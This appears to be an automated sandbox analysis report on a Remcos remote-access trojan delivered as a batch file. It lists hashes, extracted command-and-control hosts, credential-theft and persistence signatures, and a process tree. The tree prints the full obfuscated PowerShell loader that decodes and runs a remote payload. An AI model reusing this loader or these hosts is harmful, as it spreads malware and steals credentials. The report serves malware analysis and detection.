Analysis
-
max time kernel
298s -
max time network
302s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2025, 17:54
Static task
static1
Behavioral task
behavioral1
Sample
FILE_02042025 (1).bat
Resource
win10v2004-20250313-en
General
-
Target
FILE_02042025 (1).bat
-
Size
574B
-
MD5
711bed0103f2668aa733a139fbb608f0
-
SHA1
71e3a7df7486106b78cbc4f9331792426173f47f
-
SHA256
381d189e3ab62d72bc33979be7d37dfb8435f69c455e598c4da8fef9f36e2418
-
SHA512
2a4f4cb7738282b630974d7904a907109287c8f27d439114cd46a1d87e588f80e3aed2eb80b517605ee1d522d63a510b76a6f379542c9fafdc8cf061700662bc
Malware Config
Extracted
remcos
Host
45.141.233.95:8801
leak-shop.cc:8109
minerasicvalue.com:7501
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
012025-0D721P
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 4 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/5068-68-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral1/memory/5068-67-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral1/memory/2744-71-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/4676-84-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/2744-71-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/5068-68-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView behavioral1/memory/5068-67-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 16 IoCs
flow pid Process 3 1312 wscript.exe 5 1312 wscript.exe 7 1312 wscript.exe 30 4756 powershell.exe 69 4756 powershell.exe 70 4396 powershell.exe 165 4396 powershell.exe 168 2748 powershell.exe 169 2748 powershell.exe 170 2584 powershell.exe 171 2584 powershell.exe 172 208 powershell.exe 173 208 powershell.exe 174 5484 powershell.exe 175 5484 powershell.exe 176 4092 powershell.exe -
Uses browser remote debugging 2 TTPs 15 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2176 Chrome.exe 5016 Chrome.exe 556 Chrome.exe 1684 Chrome.exe 1848 Chrome.exe 4440 Chrome.exe 3308 Chrome.exe 5944 Chrome.exe 1432 msedge.exe 5024 Chrome.exe 5868 Chrome.exe 5056 msedge.exe 5588 msedge.exe 5972 Chrome.exe 380 Chrome.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts recover.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\polyporous.bat" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\polyporous.bat" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\polyporous.bat" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\polyporous.bat" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\polyporous.bat" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\polyporous.bat" powershell.exe -
pid Process 5484 powershell.exe 4092 powershell.exe 4756 powershell.exe 4396 powershell.exe 2748 powershell.exe 2584 powershell.exe 208 powershell.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 4756 set thread context of 1016 4756 powershell.exe 119 PID 1016 set thread context of 5068 1016 AddInProcess32.exe 123 PID 1016 set thread context of 2744 1016 AddInProcess32.exe 125 PID 1016 set thread context of 4676 1016 AddInProcess32.exe 126 PID 4396 set thread context of 4880 4396 powershell.exe 175 PID 2748 set thread context of 6044 2748 powershell.exe 182 PID 2584 set thread context of 5040 2584 powershell.exe 189 PID 208 set thread context of 876 208 powershell.exe 196 PID 5484 set thread context of 1988 5484 powershell.exe 203 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\en_GB\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\is\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\km\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ko\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\tr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\cy\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\pa\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\vi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\zu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\th\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\hu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\en_US\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\dasherSettingSchema.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\offscreendocument.html msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ja\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\hr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\de\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\sv\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ca\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ta\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\az\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\fr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\sr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\gl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\it\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\gu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\pt_PT\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\es_419\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\te\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\pt_BR\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\si\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ur\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\id\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\en_CA\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\service_worker_bin_prod.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\et\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\en\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ru\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_metadata\verified_contents.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\page_embed_script.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\bn\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\zh_HK\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\am\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\mr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\my\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\nl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\zh_CN\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ne\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\hy\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\offscreendocument_main.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\lv\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\eu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\lt\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ar\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\fil\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\sw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\fa\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\fr_CA\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\ro\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\iw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\manifest.fingerprint msedge.exe File created C:\Program Files\msedge_url_fetcher_5056_1901482477\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5056_137995044\_locales\fi\messages.json msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 4248 timeout.exe 4944 timeout.exe 3680 timeout.exe 1300 timeout.exe 2444 timeout.exe 3648 timeout.exe 5824 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry Chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133884357375430632" Chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1279544337-3716153908-718418795-1000\{BBFE1A0F-8EE0-4016-BD52-F2C339A5EEEF} msedge.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 4756 powershell.exe 4756 powershell.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 1016 AddInProcess32.exe 1016 AddInProcess32.exe 5068 recover.exe 5068 recover.exe 4676 recover.exe 4676 recover.exe 4440 Chrome.exe 4440 Chrome.exe 5068 recover.exe 5068 recover.exe 1016 AddInProcess32.exe 1016 AddInProcess32.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 2584 powershell.exe 2584 powershell.exe 208 powershell.exe 208 powershell.exe 5484 powershell.exe 5484 powershell.exe 4092 powershell.exe 4092 powershell.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1016 AddInProcess32.exe 1016 AddInProcess32.exe 1016 AddInProcess32.exe 1016 AddInProcess32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 5056 msedge.exe 5056 msedge.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 4676 recover.exe Token: SeShutdownPrivilege 4440 Chrome.exe Token: SeCreatePagefilePrivilege 4440 Chrome.exe Token: SeShutdownPrivilege 4440 Chrome.exe Token: SeCreatePagefilePrivilege 4440 Chrome.exe Token: SeShutdownPrivilege 4440 Chrome.exe Token: SeCreatePagefilePrivilege 4440 Chrome.exe Token: SeShutdownPrivilege 4440 Chrome.exe Token: SeCreatePagefilePrivilege 4440 Chrome.exe Token: SeShutdownPrivilege 4440 Chrome.exe Token: SeCreatePagefilePrivilege 4440 Chrome.exe Token: SeShutdownPrivilege 4440 Chrome.exe Token: SeCreatePagefilePrivilege 4440 Chrome.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 5484 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4440 Chrome.exe 4440 Chrome.exe 5056 msedge.exe 5056 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1016 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5636 wrote to memory of 1312 5636 cmd.exe 86 PID 5636 wrote to memory of 1312 5636 cmd.exe 86 PID 5636 wrote to memory of 3648 5636 cmd.exe 87 PID 5636 wrote to memory of 3648 5636 cmd.exe 87 PID 1312 wrote to memory of 4756 1312 wscript.exe 92 PID 1312 wrote to memory of 4756 1312 wscript.exe 92 PID 4756 wrote to memory of 5944 4756 powershell.exe 111 PID 4756 wrote to memory of 5944 4756 powershell.exe 111 PID 2676 wrote to memory of 3660 2676 cmd.exe 115 PID 2676 wrote to memory of 3660 2676 cmd.exe 115 PID 2676 wrote to memory of 5824 2676 cmd.exe 116 PID 2676 wrote to memory of 5824 2676 cmd.exe 116 PID 3660 wrote to memory of 4396 3660 wscript.exe 117 PID 3660 wrote to memory of 4396 3660 wscript.exe 117 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4756 wrote to memory of 1016 4756 powershell.exe 119 PID 4440 wrote to memory of 4780 4440 Chrome.exe 122 PID 4440 wrote to memory of 4780 4440 Chrome.exe 122 PID 1016 wrote to memory of 5068 1016 AddInProcess32.exe 123 PID 1016 wrote to memory of 5068 1016 AddInProcess32.exe 123 PID 1016 wrote to memory of 5068 1016 AddInProcess32.exe 123 PID 1016 wrote to memory of 5068 1016 AddInProcess32.exe 123 PID 1016 wrote to memory of 4964 1016 AddInProcess32.exe 124 PID 1016 wrote to memory of 4964 1016 AddInProcess32.exe 124 PID 1016 wrote to memory of 4964 1016 AddInProcess32.exe 124 PID 1016 wrote to memory of 2744 1016 AddInProcess32.exe 125 PID 1016 wrote to memory of 2744 1016 AddInProcess32.exe 125 PID 1016 wrote to memory of 2744 1016 AddInProcess32.exe 125 PID 1016 wrote to memory of 2744 1016 AddInProcess32.exe 125 PID 1016 wrote to memory of 4676 1016 AddInProcess32.exe 126 PID 1016 wrote to memory of 4676 1016 AddInProcess32.exe 126 PID 1016 wrote to memory of 4676 1016 AddInProcess32.exe 126 PID 1016 wrote to memory of 4676 1016 AddInProcess32.exe 126 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127 PID 4440 wrote to memory of 5504 4440 Chrome.exe 127
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FILE_02042025 (1).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5636 -
C:\Windows\system32\wscript.exewscript //nologo "C:\Windows\Temp\taluqdars.vbs"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#By#GU#YwBs#Gk#bgBp#G4#Zw#g#D0#I##n#D##LwBC#Fo#eQ#y#GU#Yg#4#Fg#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bj#HI#eQBw#HQ#bwBj#G8#YwBj#HU#cw#g#D0#I##k#HI#ZQBj#Gw#aQBu#Gk#bgBn#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bk#HI#ZQBh#HI#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#aQBh#DY#M##w#Dc#M##1#C4#dQBz#C4#YQBy#GM#a#Bp#HY#ZQ#u#G8#cgBn#C8#Mw#y#C8#aQB0#GU#bQBz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Xw#y#D##Mg#1#D##N##w#DM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#FM#cgBl#Hk#b#Bl#GE#aw#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bj#G8#YwBr#GU#eQBl#GQ#I##9#C##J#BT#HI#ZQB5#Gw#ZQBh#Gs#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#Z#By#GU#YQBy#Ck#Ow#k#HQ#ZQBs#GU#cwB5#G4#Yw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GM#bwBj#Gs#ZQB5#GU#Z##p#Ds#J#BT#WM#bwBu#G8#bQBl#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bo#GE#dQBz#GU#bg#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#By#GU#c#By#G8#dgBp#G4#Zw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#FMBYwBv#G4#bwBt#GU#KQ#7#CQ#dQBy#HQ#ZQB4#HQ#cw#g#D0#I##k#HQ#ZQBs#GU#cwB5#G4#Yw#u#Ek#bgBk#GU#e#BP#GY#K##k#Gg#YQB1#HM#ZQBu#Ck#Ow#k#HI#ZQBw#HI#bwB2#Gk#bgBn#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#dQBy#HQ#ZQB4#HQ#cw#g#C0#ZwB0#C##J#By#GU#c#By#G8#dgBp#G4#Zw#7#CQ#cgBl#H##cgBv#HY#aQBu#Gc#I##r#D0#I##k#FMBYwBv#G4#bwBt#GU#LgBM#GU#bgBn#HQ#a##7#CQ#YgBp#HM#a#Bv#H##I##9#C##J#B1#HI#d#Bl#Hg#d#Bz#C##LQ#g#CQ#cgBl#H##cgBv#HY#aQBu#Gc#Ow#k#GM#YQBs#Gw#YQB0#C##PQ#g#CQ#d#Bl#Gw#ZQBz#Hk#bgBj#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HI#ZQBw#HI#bwB2#Gk#bgBn#Cw#I##k#GI#aQBz#Gg#bwBw#Ck#Ow#k#GM#bwB1#G4#d#Bl#HI#bQBl#GE#cwB1#HI#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#GE#b#Bs#GE#d##p#Ds#J#Bl#GM#YwBo#G8#bgBk#HI#bwBz#Gk#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#dQBu#HQ#ZQBy#G0#ZQBh#HM#dQBy#GU#KQ#7#CQ#bgBv#G4#aQBu#HY#bwBs#HY#ZQBk#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#YwBy#Hk#c#B0#G8#YwBv#GM#YwB1#HM#L##n#DE#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBw#G8#b#B5#H##bwBy#G8#dQBz#Cc#L##n#EE#Z#Bk#Ek#bgBQ#HI#bwBj#GU#cwBz#DM#Mg#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBi#GE#d##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.bat "C:\Users\Public\Downloads\polyporous.bat"4⤵PID:5944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Program Files\Google\Chrome\Application\Chrome.exe--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4440 -
